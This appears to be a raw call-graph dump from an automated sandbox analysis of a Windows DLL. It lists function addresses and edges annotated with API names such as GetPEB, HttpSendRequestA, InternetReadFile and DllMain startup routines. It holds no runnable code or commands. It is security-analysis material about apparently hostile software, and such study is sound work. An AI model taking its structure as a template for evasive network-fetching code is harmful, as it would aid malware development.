7fa92a63 44281->44282 44283 7fa92ac2 GetPEB 44282->44283 44284 7fa92b51 44283->44284 44285 7fa92da0 GetPEB 44284->44285 44286 7fa92e32 GetPEB 44285->44286 44288 7fa9307f GetPEB 44286->44288 44291 7fa932a0 PathIsDirectoryW 44288->44291 44292 7fa93477 44291->44292 44292->44238 44293 7fa7c9e0 44292->44293 44294 7fa7cad9 44293->44294 44296 7fa7ca54 swprintf 44293->44296 44294->44226 44331 7fabd78c 44 API calls 44296->44331 44298 7fa8793b 44297->44298 44299 7fa8793f GetLastError 44297->44299 44298->44231 44298->44232 44299->44298 44300 7fa8794c CloseHandle 44299->44300 44300->44298 44302 7fa7211e 44301->44302 44303 7fa7210c 44301->44303 44305 7fa72370 GetPEB 44302->44305 44332 7faac370 GetPEB 44303->44332 44305->44238 44307 7fa722ce 44306->44307 44308 7fa722bc 44306->44308 44307->44242 44318 7fa71f50 GetPEB 44307->44318 44328 7faac370 GetPEB 44308->44328 44311 7fa7fe5d 44310->44311 44313 7fa7fdd8 swprintf 44310->44313 44311->44265 44329 7fabd78c 44 API calls 44313->44329 44315 7fa804c5 44314->44315 44317 7fa80440 swprintf 44314->44317 44315->44272 44330 7fabd78c 44 API calls 44317->44330 44318->44242 44319->44246 44320->44250 44321->44254 44322->44258 44323->44262 44324->44271 44325->44275 44326->44279 44327->44277 44328->44307 44329->44311 44330->44315 44331->44294 44332->44302 44333 7fabda05 44334 7fabda43 44333->44334 44335 7fabda10 44333->44335 44361 7fabdb5f 88 API calls 4 library calls 44334->44361 44336 7fabda35 44335->44336 44337 7fabda15 44335->44337 44345 7fabda58 44336->44345 44339 7fabda2b 44337->44339 44340 7fabda1a 44337->44340 44360 7fabd536 23 API calls 44339->44360 44344 7fabda1f 44340->44344 44359 7fabd555 21 API calls 44340->44359 44346 7fabda64 ___scrt_is_nonwritable_in_current_image 44345->44346 44362 7fabd5c6 44346->44362 44348 7fabdace ___scrt_is_nonwritable_in_current_image std::locale::_Setgloballocale 44348->44344 44349 7fabda6b __DllMainCRTStartup@12 44349->44348 44350 7fabda92 44349->44350 44351 7fabdb57 44349->44351 44373 7fabd528 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 44350->44373 44376 7fabe077 4 API calls 2 library calls 44351->44376 44354 7fabdb5e 44355 7fabdaa1 __RTC_Initialize 44355->44348 44374 7fabe22c InitializeSListHead 44355->44374 44357 7fabdaaf 44357->44348 44375 7fabd4fd IsProcessorFeaturePresent ___scrt_release_startup_lock 44357->44375 44359->44344 44360->44344 44361->44344 44363 7fabd5cf 44362->44363 44377 7fabde2c IsProcessorFeaturePresent 44363->44377 44365 7fabd5db 44378 7fac099e 10 API calls 2 library calls 44365->44378 44367 7fabd5e0 44368 7fabd5e4 44367->44368 44379 7facde78 44367->44379 44368->44349 44371 7fabd5fb 44371->44349 44373->44355 44374->44357 44375->44348 44376->44354 44377->44365 44378->44367 44383 7fad5725 44379->44383 44382 7fac09d0 7 API calls 2 library calls 44382->44368 44384 7fad5735 44383->44384 44385 7fabd5ed 44383->44385 44384->44385 44387 7fad18dd 44384->44387 44385->44371 44385->44382 44388 7fad18e4 44387->44388 44389 7fad1927 GetStdHandle 44388->44389 44390 7fad1989 44388->44390 44391 7fad193a GetFileType 44388->44391 44389->44388 44390->44384 44391->44388 44392 7fabdd45 44393 7fabdd4e 44392->44393 44394 7fabdd53 44392->44394 44409 7fabe1e1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 44393->44409 44398 7fabdc0f 44394->44398 44399 7fabdc1b ___scrt_is_nonwritable_in_current_image 44398->44399 44400 7fabdc44 dllmain_raw 44399->44400 44401 7fabdc2a 44399->44401 44404 7fabdc3f __DllMainCRTStartup@12 44399->44404 44400->44401 44402 7fabdc5e dllmain_crt_dispatch 44400->44402 44402->44401 44402->44404 44403 7fabdcb0 44403->44401 44405 7fabdcb9 dllmain_crt_dispatch 44403->44405 44404->44403 44410 7fabdb5f 88 API calls 4 library calls 44404->44410 44405->44401 44406 7fabdccc dllmain_raw 44405->44406 44406->44401 44408 7fabdca5 dllmain_raw 44408->44403 44409->44394 44410->44408 44411 7faa6145 44412 7faa614e 44411->44412 44413 7fa646c0 84 API calls 44412->44413 44414 7faa615d 44413->44414 44415 7faa616d 44414->44415 44416 7faa6282 44414->44416 44417 7fa76650 std::ios_base::clear 42 API calls 44415->44417 44586 7faa21e0 44416->44586 44420 7faa6181 44417->44420 44419 7faa6299 std::ios_base::clear 44601 7faa46e0 GetPEB 44419->44601 44421 7fa646c0 84 API calls 44420->44421 44422 7faa61ae 44421->44422 44804 7fa7a960 84 API calls 4 library calls 44422->44804 44425 7faa61b5 44805 7fa6d4a0 44425->44805 44427 7faa62cc 44431 7fa65450 numpunct 42 API calls 44427->44431 44430 7faa61ec std::ios_base::clear 44433 7faa46e0 4 API calls 44430->44433 44432 7faa6347 44431->44432 44434 7fa91370 std::ios_base::clear 41 API calls 44432->44434 44435 7faa621f 44433->44435 44436 7faa6356 44434->44436 44824 7fa63160 44435->44824 44605 7fa649c0 44436->44605 44441 7fa646c0 84 API calls 44444 7faa625c 44441->44444 44443 7faa638b 44445 7fa91370 std::ios_base::clear 41 API calls 44443->44445 44829 7fa7a960 84 API calls 4 library calls 44444->44829 44447 7faa6396 44445->44447 44615 7fab1890 44447->44615 44448 7faa6263 44830 7fa7a050 84 API calls Concurrency::cancellation_token_source::~cancellation_token_source 44448->44830 44451 7faa63b1 44456 7faa6417 44451->44456 44831 7fa7c660 44 API calls swprintf 44451->44831 44452 7faa626e 44453 7fa91370 std::ios_base::clear 41 API calls 44452->44453 44455 7faa627d 44453->44455 44456->44456 44457 7fa65450 numpunct 42 API calls 44456->44457 44459 7faa6495 44457->44459 44458 7faa63da std::ios_base::clear 44832 7fa71fb0 GetPEB 44458->44832 44460 7fab1890 97 API calls 44459->44460 44462 7faa64b7 44460->44462 44464 7fa91370 std::ios_base::clear 41 API calls 44462->44464 44463 7faa640a 44463->44456 44466 7faa6b5a 44463->44466 44465 7faa64c9 44464->44465 44470 7faa6528 44465->44470 44833 7fa819a0 44 API calls swprintf 44465->44833 44467 7fa76650 std::ios_base::clear 42 API calls 44466->44467 44469 7faa6b6e 44467->44469 44471 7fa76650 std::ios_base::clear 42 API calls 44469->44471 44470->44470 44475 7fa65450 numpunct 42 API calls 44470->44475 44472 7faa6b8f 44471->44472 44845 7fa95af0 89 API calls 4 library calls 44472->44845 44474 7faa64eb std::ios_base::clear 44834 7fa71fb0 GetPEB 44474->44834 44477 7faa65a6 44475->44477 44476 7faa6b9c 44478 7fa91370 std::ios_base::clear 41 API calls 44476->44478 44480 7fab1890 97 API calls 44477->44480 44481 7faa6bbd 44478->44481 44483 7faa65c8 44480->44483 44484 7fa91370 std::ios_base::clear 41 API calls 44481->44484 44482 7faa651b 44482->44470 44490 7faa6a91 44482->44490 44485 7fa91370 std::ios_base::clear 41 API calls 44483->44485 44487 7faa6bcc 44484->44487 44486 7faa65da 44485->44486 44488 7faa6639 44486->44488 44835 7fa7d680 44 API calls swprintf 44486->44835 44489 7fa91370 std::ios_base::clear 41 API calls 44487->44489 44494 7fa76a80 numpunct 42 API calls 44488->44494 44493 7faa6bd8 44489->44493 44492 7fa76650 std::ios_base::clear 42 API calls 44490->44492 44495 7faa6aa5 44492->44495 44496 7fa91370 std::ios_base::clear 41 API calls 44493->44496 44497 7faa664a 44494->44497 44498 7fa76650 std::ios_base::clear 42 API calls 44495->44498 44499 7faa6be4 44496->44499 44500 7fab1890 97 API calls 44497->44500 44502 7faa6ac6 44498->44502 44503 7fa92480 Concurrency::cancellation_token_source::~cancellation_token_source 83 API calls 44499->44503 44501 7faa666c 44500->44501 44504 7fa91370 std::ios_base::clear 41 API calls 44501->44504 44843 7fa95af0 89 API calls 4 library calls 44502->44843 44507 7faa6bf0 44503->44507 44508 7faa667e 44504->44508 44505 7faa65fc std::ios_base::clear 44836 7fa71fb0 GetPEB 44505->44836 44846 7fa95ea0 84 API calls 4 library calls 44507->44846 44511 7faa66dd GetPEB 44508->44511 44837 7fa7f1a0 44 API calls swprintf 44508->44837 44509 7faa6ad3 44513 7fa91370 std::ios_base::clear 41 API calls 44509->44513 44530 7faa6727 44511->44530 44517 7faa6af4 44513->44517 44514 7faa6bfd 44518 7fa91370 std::ios_base::clear 41 API calls 44514->44518 44516 7faa662c 44516->44488 44522 7faa69b9 44516->44522 44519 7fa91370 std::ios_base::clear 41 API calls 44517->44519 44520 7faa69b1 44518->44520 44521 7faa6b03 44519->44521 44523 7fa91370 std::ios_base::clear 41 API calls 44521->44523 44526 7fa76650 std::ios_base::clear 42 API calls 44522->44526 44524 7faa6b12 44523->44524 44527 7fa91370 std::ios_base::clear 41 API calls 44524->44527 44525 7faa66a0 std::ios_base::clear 44838 7fa71fb0 GetPEB 44525->44838 44528 7faa69cd 44526->44528 44529 7faa6b1e 44527->44529 44532 7fa76650 std::ios_base::clear 42 API calls 44528->44532 44533 7fa91370 std::ios_base::clear 41 API calls 44529->44533 44537 7fa76650 std::ios_base::clear 42 API calls 44530->44537 44535 7faa69ee 44532->44535 44538 7faa6b2a 44533->44538 44534 7faa66d0 44534->44511 44534->44530 44841 7fa95af0 89 API calls 4 library calls 44535->44841 44540 7faa68e6 44537->44540 44541 7fa92480 Concurrency::cancellation_token_source::~cancellation_token_source 83 API calls 44538->44541 44539 7faa69fb 44542 7fa91370 std::ios_base::clear 41 API calls 44539->44542 44543 7fa76650 std::ios_base::clear 42 API calls 44540->44543 44544 7faa6b36 44541->44544 44545 7faa6a1c 44542->44545 44546 7faa6907 44543->44546 44844 7fa95ea0 84 API calls 4 library calls 44544->44844 44548 7fa91370 std::ios_base::clear 41 API calls 44545->44548 44839 7fa95af0 89 API calls 4 library calls 44546->44839 44551 7faa6a2b 44548->44551 44550 7faa6b43 44553 7fa91370 std::ios_base::clear 41 API calls 44550->44553 44554 7fa91370 std::ios_base::clear 41 API calls 44551->44554 44552 7faa6914 44555 7fa91370 std::ios_base::clear 41 API calls 44552->44555 44553->44520 44556 7faa6a3a 44554->44556 44557 7faa6935 44555->44557 44558 7fa91370 std::ios_base::clear 41 API calls 44556->44558 44559 7fa91370 std::ios_base::clear 41 API calls 44557->44559 44560 7faa6a49 44558->44560 44561 7faa6944 44559->44561 44562 7fa91370 std::ios_base::clear 41 API calls 44560->44562 44563 7fa91370 std::ios_base::clear 41 API calls 44561->44563 44564 7faa6a55 44562->44564 44565 7faa6953 44563->44565 44566 7fa91370 std::ios_base::clear 41 API calls 44564->44566 44567 7fa91370 std::ios_base::clear 41 API calls 44565->44567 44568 7faa6a61 44566->44568 44569 7faa6962 44567->44569 44570 7fa92480 Concurrency::cancellation_token_source::~cancellation_token_source 83 API calls 44568->44570 44571 7fa91370 std::ios_base::clear 41 API calls 44569->44571 44573 7faa6a6d 44570->44573 44572 7faa6971 44571->44572 44575 7fa91370 std::ios_base::clear 41 API calls 44572->44575 44842 7fa95ea0 84 API calls 4 library calls 44573->44842 44577 7faa697d 44575->44577 44576 7faa6a7a 44578 7fa91370 std::ios_base::clear 41 API calls 44576->44578 44579 7fa91370 std::ios_base::clear 41 API calls 44577->44579 44578->44520 44580 7faa6989 44579->44580 44581 7fa92480 Concurrency::cancellation_token_source::~cancellation_token_source 83 API calls 44580->44581 44582 7faa6995 44581->44582 44840 7fa95ea0 84 API calls 4 library calls 44582->44840 44584 7faa69a2 44585 7fa91370 std::ios_base::clear 41 API calls 44584->44585 44585->44520 44587 7faa2216 44586->44587 44847 7fa77a50 44587->44847 44589 7faa223a 44850 7fa77ba0 44589->44850 44591 7faa2285 _Ptr_base 44592 7faa22ca 44591->44592 44593 7faa22ac 44591->44593 44857 7faa2370 83 API calls Concurrency::cancellation_token_source::~cancellation_token_source 44592->44857 44856 7faa2370 83 API calls Concurrency::cancellation_token_source::~cancellation_token_source 44593->44856 44596 7faa22c8 std::ios_base::clear 44597 7fa91370 std::ios_base::clear 41 API calls 44596->44597 44598 7faa2325 _Ptr_base 44597->44598 44599 7fa91370 std::ios_base::clear 41 API calls 44598->44599 44600 7faa2351 44599->44600 44600->44419 44602 7faa470e 44601->44602 44921 7fa92670 44602->44921 44606 7fa649dc numpunct 44605->44606 44606->44606 44608 7fa64a21 44606->44608 44928 7fa91670 42 API calls numpunct 44606->44928 44924 7fa770a0 44608->44924 44610 7fa64a9b 44611 7fa7a110 44610->44611 44612 7fa7a12c 44611->44612 44614 7fa7a127 std::ios_base::clear 44611->44614 44613 7fa91370 std::ios_base::clear 41 API calls 44612->44613 44613->44614 44614->44443 44616 7fab18b2 _fwprintf_s 44615->44616 44930 7fa77380 44616->44930 44622 7fab18f8 44949 7fa7efb0 44622->44949 44624 7fab1922 44953 7fa7bab0 44624->44953 44626 7fab194c 44957 7fa7fb00 44626->44957 44628 7fab1976 44961 7fa83680 44628->44961 44630 7fab19a0 44965 7fa80d20 44630->44965 44632 7fab19ca 44969 7fa7d210 44632->44969 44634 7fab19f4 44973 7fa80810 44634->44973 44636 7fab1a1e 44637 7fab1a2f GetPEB 44636->44637 44638 7fab1a96 44637->44638 44977 7fa7eeb0 44638->44977 44640 7fab1ccc 44641 7fab1cdd GetPEB 44640->44641 44642 7fab1d44 44641->44642 44643 7fa77380 73 API calls 44642->44643 44644 7fab1f7a 44643->44644 44981 7fa7d3d0 44644->44981 44646 7fab1f8b 44985 7fa63ea0 44646->44985 44651 7fa63ea0 42 API calls 44652 7fab1fd3 44651->44652 44653 7fa63ea0 42 API calls 44652->44653 44654 7fab1fdc 44653->44654 44997 7fa7fcd0 44654->44997 44656 7fab1fec 44657 7fa63ea0 42 API calls 44656->44657 44658 7fab2017 44657->44658 44659 7fa63ea0 42 API calls 44658->44659 44660 7fab2020 44659->44660 45001 7fa7d740 44660->45001 44662 7fab2030 44663 7fa63ea0 42 API calls 44662->44663 44664 7fab205f 44663->44664 44665 7fa63e20 42 API calls 44664->44665 44666 7fab2068 44665->44666 44667 7fa63ea0 42 API calls 44666->44667 44668 7fab2071 44667->44668 45005 7fa83890 44668->45005 44670 7fab2081 44671 7fa63ea0 42 API calls 44670->44671 44672 7fab20bf 44671->44672 44673 7fa7a280 71 API calls 44672->44673 44674 7fab20c9 44673->44674 44675 7fa63ea0 42 API calls 44674->44675 44676 7fab20cf 44675->44676 45009 7fa7cce0 44676->45009 44678 7fab20df 44679 7fa63ea0 42 API calls 44678->44679 44680 7fab210a 44679->44680 44681 7fa63ea0 42 API calls 44680->44681 44682 7fab2113 44681->44682 45013 7fa7e7e0 44682->45013 44684 7fab2128 45017 7fa7c1c0 44684->45017 44686 7fab2141 44687 7fa63ea0 42 API calls 44686->44687 44688 7fab2173 44687->44688 44689 7fa63ea0 42 API calls 44688->44689 44690 7fab217c 44689->44690 44691 7fa63ea0 42 API calls 44690->44691 44692 7fab2185 44691->44692 44693 7fa63e20 42 API calls 44692->44693 44694 7fab2198 44693->44694 45021 7faba420 44694->45021 44697 7fab2257 44698 7fab2594 std::ios_base::clear 44697->44698 44700 7fab24a6 44697->44700 44699 7fab25ce GetPEB 44698->44699 44706 7fab2672 44699->44706 44700->44700 44701 7fa65450 numpunct 42 API calls 44700->44701 44702 7fab2539 44701->44702 44703 7fa91370 std::ios_base::clear 41 API calls 44702->44703 44704 7fab2555 44703->44704 45027 7fa795d0 41 API calls 44704->45027 44708 7fab2c1b std::ios_base::clear 44706->44708 44709 7fab28df GetPEB 44706->44709 44707 7fab2564 45028 7fa795d0 41 API calls 44707->45028 44711 7fab2c6f GetPEB 44708->44711 44713 7fab291f 44709->44713 44712 7fab2d13 44711->44712 44714 7fab2f7d GetPEB 44712->44714 44717 7fab3529 44712->44717 44715 7fa65450 numpunct 42 API calls 44713->44715 44723 7fab2fbc GetPEB 44714->44723 44716 7fab2bc0 44715->44716 44718 7fa91370 std::ios_base::clear 41 API calls 44716->44718 44717->44717 44720 7fa65450 numpunct 42 API calls 44717->44720 44719 7fab2bdc 44718->44719 45029 7fa795d0 41 API calls 44719->45029 44725 7fab35b2 std::ios_base::clear 44720->44725 44722 7fab2beb 45030 7fa795d0 41 API calls 44722->45030 44731 7fab321b 44723->44731 44727 7fab360b GetPEB 44725->44727 44732 7fab368d HttpSendRequestA 44727->44732 44728 7fab2581 std::ios_base::_Ios_base_dtor 44728->44451 44730 7fab38e4 GetPEB 44737 7fab3924 GetPEB 44730->44737 44733 7fa65450 numpunct 42 API calls 44731->44733 44732->44730 44745 7fab40bc 44732->44745 44734 7fab34ce 44733->44734 44736 7fa91370 std::ios_base::clear 41 API calls 44734->44736 44735 7fab40f2 GetPEB 44735->44745 44738 7fab34ea 44736->44738 44749 7fab3b72 GetPEB 44737->44749 45031 7fa795d0 41 API calls 44738->45031 44741 7fab34f9 45032 7fa795d0 41 API calls 44741->45032 44742 7fab437d InternetReadFile 44743 7fab43df 44742->44743 44742->44745 44746 7fab4c18 GetPEB 44743->44746 44747 7fab43ec GetPEB 44743->44747 44745->44735 44745->44742 44745->44743 45035 7fa92280 42 API calls std::ios_base::clear 44745->45035 44754 7fab4c58 InternetCloseHandle GetPEB 44746->44754 44752 7fab442c GetPEB 44747->44752 44758 7fab3dc0 44749->44758 44755 7fab468c GetPEB 44752->44755 44756 7fab4eb8 GetPEB 44754->44756 44775 7fab48ec 44755->44775 44768 7fab5118 44756->44768 44760 7fa65450 numpunct 42 API calls 44758->44760 44761 7fab4052 44760->44761 44762 7fa91370 std::ios_base::clear 41 API calls 44761->44762 44763 7fab406e 44762->44763 44764 7fa91370 std::ios_base::clear 41 API calls 44763->44764 44765 7fab407d 44764->44765 45033 7fa795d0 41 API calls 44765->45033 44767 7fab408c 45034 7fa795d0 41 API calls 44767->45034 44769 7fab535d 44768->44769 44774 7fab53fd std::ios_base::clear 44768->44774 45038 7fa76850 42 API calls numpunct 44769->45038 44772 7fab537f 44773 7fa91370 std::ios_base::clear 41 API calls 44772->44773 44776 7fab53a0 44773->44776 44779 7fa91370 std::ios_base::clear 41 API calls 44774->44779 44777 7fa65450 numpunct 42 API calls 44775->44777 44778 7fa91370 std::ios_base::clear 41 API calls 44776->44778 44780 7fab4b9f 44777->44780 44781 7fab53af 44778->44781 44782 7fab545f 44779->44782 44783 7fa91370 std::ios_base::clear 41 API calls 44780->44783 44784 7fa91370 std::ios_base::clear 41 API calls 44781->44784 44785 7fa91370 std::ios_base::clear 41 API calls 44782->44785 44786 7fab4bbb 44783->44786 44787 7fab53be 44784->44787 44788 7fab546e 44785->44788 44789 7fa91370 std::ios_base::clear 41 API calls 44786->44789 45039 7fa795d0 41 API calls 44787->45039 44791 7fa91370 std::ios_base::clear 41 API calls 44788->44791 44792 7fab4bca 44789->44792 44794 7fab547d 44791->44794 44795 7fa91370 std::ios_base::clear 41 API calls 44792->44795 44793 7fab53cd 45040 7fa795d0 41 API calls 44793->45040 45041 7fa795d0 41 API calls 44794->45041 44797 7fab4bd9 44795->44797 45036 7fa795d0 41 API calls 44797->45036 44799 7fab548c std::ios_base::_Ios_base_dtor 45042 7fa795d0 41 API calls 44799->45042 44800 7fab4be8 45037 7fa795d0 41 API calls 44800->45037 44804->44425 44806 7fa6d4cd 44805->44806 45175 7fa6d370 44806->45175 44808 7fa6d4f0 std::ios_base::clear 44809 7fa91370 std::ios_base::clear 41 API calls 44808->44809 44810 7fa6d517 44809->44810 44811 7fa94160 44810->44811 44812 7fa76650 std::ios_base::clear 42 API calls 44811->44812 44813 7fa941b9 44812->44813 45198 7faafad0 44813->45198 44816 7fa76650 std::ios_base::clear 42 API calls 44817 7fa941d6 44816->44817 45202 7fab5530 44817->45202 44820 7fa91370 std::ios_base::clear 41 API calls 44821 7fa941fa 44820->44821 44822 7fa91370 std::ios_base::clear 41 API calls 44821->44822 44823 7fa94209 44822->44823 44823->44430 45208 7fa75820 44824->45208 44827 7fa92480 Concurrency::cancellation_token_source::~cancellation_token_source 83 API calls 44828 7fa631af 44827->44828 44828->44441 44829->44448 44830->44452 44831->44458 44832->44463 44833->44474 44834->44482 44835->44505 44836->44516 44837->44525 44838->44534 44839->44552 44840->44584 44841->44539 44842->44576 44843->44509 44844->44550 44845->44476 44846->44514 44858 7fa723a0 44847->44858 44849 7fa77a6d _Ptr_base 44849->44589 44851 7fa77c27 _memcpy_s 44850->44851 44861 7facb85c 44851->44861 44853 7fa77c2f _memcpy_s 44866 7fa769f0 44853->44866 44855 7fa77cc5 _Ptr_base 44855->44591 44856->44596 44857->44596 44859 7fabd43b std::_Facet_Register 3 API calls 44858->44859 44860 7fa723b4 _Ptr_base 44859->44860 44860->44849 44869 7faceb5c GetLastError 44861->44869 44913 7fa65680 44866->44913 44868 7fa76a5c 44868->44855 44870 7faceb78 44869->44870 44871 7faceb72 44869->44871 44875 7faceb7c 44870->44875 44903 7fad0fda 6 API calls std::_Lockit::_Lockit 44870->44903 44902 7fad0f9b 6 API calls std::_Lockit::_Lockit 44871->44902 44874 7faceb94 44874->44875 44876 7faceb9c 44874->44876 44878 7facec01 SetLastError 44875->44878 44904 7fad07fe 14 API calls 3 library calls 44876->44904 44880 7facb867 44878->44880 44881 7facec11 44878->44881 44879 7faceba9 44882 7facebb1 44879->44882 44883 7facebc2 44879->44883 44898 7fad09c9 44880->44898 44911 7facca21 41 API calls std::locale::_Setgloballocale 44881->44911 44905 7fad0fda 6 API calls std::_Lockit::_Lockit 44882->44905 44906 7fad0fda 6 API calls std::_Lockit::_Lockit 44883->44906 44888 7facebbf 44908 7fad085b 14 API calls __dosmaperr 44888->44908 44889 7facebce 44890 7facebe9 44889->44890 44891 7facebd2 44889->44891 44909 7face95e 14 API calls __Getctype 44890->44909 44907 7fad0fda 6 API calls std::_Lockit::_Lockit 44891->44907 44895 7facebf4 44910 7fad085b 14 API calls __dosmaperr 44895->44910 44896 7facebe6 44896->44878 44899 7fad09dc 44898->44899 44900 7facb877 44898->44900 44899->44900 44912 7fad5ae0 41 API calls 4 library calls 44899->44912 44900->44853 44902->44870 44903->44874 44904->44879 44905->44888 44906->44889 44907->44888 44908->44896 44909->44895 44910->44896 44912->44900 44914 7fa65697 numpunct 44913->44914 44916 7fa656a1 numpunct 44914->44916 44919 7fa91670 42 API calls numpunct 44914->44919 44918 7fa656ba _memcpy_s 44916->44918 44920 7fa64ae0 42 API calls 2 library calls 44916->44920 44918->44868 44919->44916 44920->44918 44922 7fa916a0 3 API calls 44921->44922 44923 7fa926c9 44922->44923 44923->44427 44925 7fa771c9 ctype 44924->44925 44926 7fa77136 numpunct 44924->44926 44925->44610 44929 7fa64ae0 42 API calls 2 library calls 44926->44929 44928->44608 44929->44925 44931 7fa773ab 44930->44931 45043 7fa75e00 44931->45043 44936 7fa7a280 45140 7fa78d50 44936->45140 44939 7fa93640 std::ios_base::clear 42 API calls 44941 7fa7a462 44939->44941 45144 7fa79ef0 44941->45144 44944 7fa7a317 std::ios_base::_Ios_base_dtor 44944->44939 44945 7fa7ea50 44947 7fa7eb0d 44945->44947 44948 7fa7ea88 swprintf 44945->44948 44947->44622 45151 7fabd78c 44 API calls 44948->45151 44951 7fa7eff8 swprintf 44949->44951 44952 7fa7f07d 44949->44952 45152 7fabd78c 44 API calls 44951->45152 44952->44624 44955 7fa7bb71 44953->44955 44956 7fa7baec swprintf 44953->44956 44955->44626 45153 7fabd78c 44 API calls 44956->45153 44958 7fa7fbd9 44957->44958 44960 7fa7fb54 swprintf 44957->44960 44958->44628 45154 7fabd78c 44 API calls 44960->45154 44962 7fa83769 44961->44962 44964 7fa836e4 swprintf 44961->44964 44962->44630 45155 7fabd78c 44 API calls 44964->45155 44966 7fa80e85 44965->44966 44967 7fa80e00 swprintf 44965->44967 44966->44632 45156 7fabd78c 44 API calls 44967->45156 44970 7fa7d311 44969->44970 44972 7fa7d28c swprintf 44969->44972 44970->44634 45157 7fabd78c 44 API calls 44972->45157 44974 7fa808c9 44973->44974 44975 7fa80844 swprintf 44973->44975 44974->44636 45158 7fabd78c 44 API calls 44975->45158 44978 7fa7efa1 44977->44978 44980 7fa7ef1c swprintf 44977->44980 44978->44640 45159 7fabd78c 44 API calls 44980->45159 44982 7fa7d481 44981->44982 44984 7fa7d3fc swprintf 44981->44984 44982->44646 45160 7fabd78c 44 API calls 44984->45160 44986 7fa63ede 44985->44986 44987 7fa78d50 42 API calls 44986->44987 44992 7fa63fef 44987->44992 44988 7fa93640 std::ios_base::clear 42 API calls 44989 7fa6430f 44988->44989 44990 7fa79ef0 42 API calls 44989->44990 44991 7fa6432a 44990->44991 44993 7fa63e20 44991->44993 44992->44988 44994 7fa63e44 44993->44994 45161 7fa693d0 44994->45161 44998 7fa7fd81 44997->44998 45000 7fa7fcfc swprintf 44997->45000 44998->44656 45169 7fabd78c 44 API calls 45000->45169 45002 7fa7d7f1 45001->45002 45004 7fa7d76c swprintf 45001->45004 45002->44662 45170 7fabd78c 44 API calls 45004->45170 45006 7fa83941 45005->45006 45008 7fa838bc swprintf 45005->45008 45006->44670 45171 7fabd78c 44 API calls 45008->45171 45010 7fa7cd91 45009->45010 45012 7fa7cd0c swprintf 45009->45012 45010->44678 45172 7fabd78c 44 API calls 45012->45172 45014 7fa7e891 45013->45014 45016 7fa7e80c swprintf 45013->45016 45014->44684 45173 7fabd78c 44 API calls 45016->45173 45019 7fa7c271 45017->45019 45020 7fa7c1ec swprintf 45017->45020 45019->44686 45174 7fabd78c 44 API calls 45020->45174 45022 7faba454 45021->45022 45023 7faba47d std::ios_base::clear 45022->45023 45024 7fa92510 42 API calls 45022->45024 45025 7fa91370 std::ios_base::clear 41 API calls 45023->45025 45024->45023 45026 7fab21ad GetPEB 45025->45026 45026->44697 45027->44707 45028->44728 45029->44722 45030->44728 45031->44741 45032->44728 45033->44767 45034->44728 45035->44745 45036->44800 45037->44728 45038->44772 45039->44793 45040->44728 45041->44799 45042->44728 45046 7fa75e2b 45043->45046 45052 7fa75f00 45046->45052 45049 7fa772f0 45134 7fa764d0 45049->45134 45051 7fa77301 45051->44936 45053 7fa75f2b 45052->45053 45060 7faacda0 45053->45060 45056 7fa763e0 45057 7fa7640b 45056->45057 45059 7fa75eab 45057->45059 45133 7fabcf0d 9 API calls 2 library calls 45057->45133 45059->45049 45069 7fa8f690 45060->45069 45064 7faace13 45065 7fa75e93 45064->45065 45088 7fabcf0d 9 API calls 2 library calls 45064->45088 45065->45056 45066 7faacdce 45066->45064 45080 7fa93640 45066->45080 45070 7fa93640 std::ios_base::clear 42 API calls 45069->45070 45071 7fa8f712 45070->45071 45072 7fabd43b std::_Facet_Register 3 API calls 45071->45072 45073 7fa8f719 45072->45073 45074 7fa8f733 45073->45074 45089 7fabca04 46 API calls 6 library calls 45073->45089 45076 7fababf0 45074->45076 45077 7fabac2d 45076->45077 45090 7fa75960 45077->45090 45079 7fabac49 std::ios_base::_Ios_base_dtor 45079->45066 45081 7fa93669 45080->45081 45082 7fa936cc 45080->45082 45084 7fa9367a std::ios_base::clear 45081->45084 45130 7fabe725 RaiseException 45081->45130 45082->45064 45131 7fa786a0 42 API calls 2 library calls 45084->45131 45086 7fa936be 45132 7fabe725 RaiseException 45086->45132 45088->45065 45089->45074 45104 7fabc5ec 45090->45104 45094 7fa759a5 45103 7fa759c7 45094->45103 45123 7fa8ee20 71 API calls 2 library calls 45094->45123 45096 7fa75a80 45096->45079 45098 7fa759df 45099 7fa759e7 45098->45099 45100 7fa759ee 45098->45100 45124 7fa90d10 RaiseException Concurrency::cancel_current_task 45099->45124 45125 7fabc9d2 RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 45100->45125 45116 7fabc644 45103->45116 45105 7fabc5fb 45104->45105 45106 7fabc602 45104->45106 45126 7facc0ff 6 API calls std::_Lockit::_Lockit 45105->45126 45108 7fa7598c 45106->45108 45127 7fabd070 EnterCriticalSection 45106->45127 45110 7fa7ad10 45108->45110 45111 7fa7ad55 45110->45111 45112 7fa7ad21 45110->45112 45111->45094 45113 7fabc5ec std::_Lockit::_Lockit 7 API calls 45112->45113 45114 7fa7ad2b 45113->45114 45115 7fabc644 std::_Lockit::~_Lockit 2 API calls 45114->45115 45115->45111 45117 7facc10d 45116->45117 45118 7fabc64e 45116->45118 45129 7facc0e8 LeaveCriticalSection 45117->45129 45119 7fabc661 45118->45119 45128 7fabd07e LeaveCriticalSection 45118->45128 45119->45096 45122 7facc114 45122->45096 45123->45098 45124->45103 45125->45103 45126->45108 45127->45108 45128->45119 45129->45122 45130->45084 45131->45086 45132->45082 45133->45059 45135 7fabd43b std::_Facet_Register 3 API calls 45134->45135 45136 7fa76576 45135->45136 45138 7fa76590 45136->45138 45139 7fabca04 46 API calls 6 library calls 45136->45139 45138->45051 45139->45138 45141 7fa78d9b 45140->45141 45143 7fa78dea 45141->45143 45149 7faa6c20 42 API calls std::ios_base::clear 45141->45149 45143->44944 45148 7fa75aa0 71 API calls 5 library calls 45143->45148 45145 7fa79f13 45144->45145 45146 7fa79f3c 45145->45146 45150 7fa90960 42 API calls std::ios_base::clear 45145->45150 45146->44945 45148->44944 45149->45143 45150->45146 45151->44947 45152->44952 45153->44955 45154->44958 45155->44962 45156->44966 45157->44970 45158->44974 45159->44978 45160->44982 45162 7fa69428 45161->45162 45163 7fa78d50 42 API calls 45162->45163 45165 7fa694a8 45163->45165 45164 7fa93640 std::ios_base::clear 42 API calls 45166 7fa6978b 45164->45166 45165->45164 45167 7fa79ef0 42 API calls 45166->45167 45168 7fa63e8d 45167->45168 45168->44651 45169->44998 45170->45002 45171->45006 45172->45010 45173->45014 45174->45019 45176 7fa6d393 45175->45176 45177 7fa76a80 numpunct 42 API calls 45176->45177 45178 7fa6d436 45176->45178 45179 7fa6d3c6 45177->45179 